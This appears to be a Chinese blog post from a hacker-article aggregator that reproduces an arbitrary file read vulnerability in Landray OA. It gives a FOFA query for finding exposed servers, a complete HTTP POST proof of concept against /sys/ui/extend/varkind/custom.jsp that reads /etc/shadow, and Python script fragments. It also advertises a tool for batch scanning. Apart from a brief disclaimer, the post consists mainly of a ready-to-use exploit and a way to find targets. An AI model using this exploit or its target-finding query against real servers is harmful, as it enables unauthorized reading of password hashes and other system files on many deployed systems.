记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

漏洞复现-蓝凌OA文件读取

2021-05-04 11:26

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


FOFA语句:

app="Landray-OA"


漏洞相关介绍:

深圳市蓝凌软件股份有限公司成立于2001年,生态OA引领者、数字化工作专业服务商、阿里云知识管理与协同领域首家战略合作伙伴,为各类组织提供智能办公、移动门户、知识管理、合同管理、数字运营、财务共享等一体化解决方案,近期Landray-OA系统被爆出存任意文件读取漏洞。


漏洞POC分析:


POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
var={"body":{"file":"file:///etc/shadow"}}


漏洞利用截图:


脚本部分代码:

target = url+"/sys/ui/extend/varkind/custom.jsp"    headers = {      'Content-Type': 'application/x-www-form-urlencoded',      'Accept-Encoding': 'gzip',    }    data = 'var={"body":{"file":"file:///etc/shadow"}}'


脚本利用截图:

支持批量扫描,单个扫描!

获取脚本回复:蓝凌OA


知识来源: https://mp.weixin.qq.com/s?__biz=MzkxMTE1NjMyMA==&mid=2247483936&idx=1&sn=0eac83b2f80a5ef180503123493d4228

阅读:287749 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“漏洞复现-蓝凌OA文件读取”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求投资、赞助、支持💖

标签云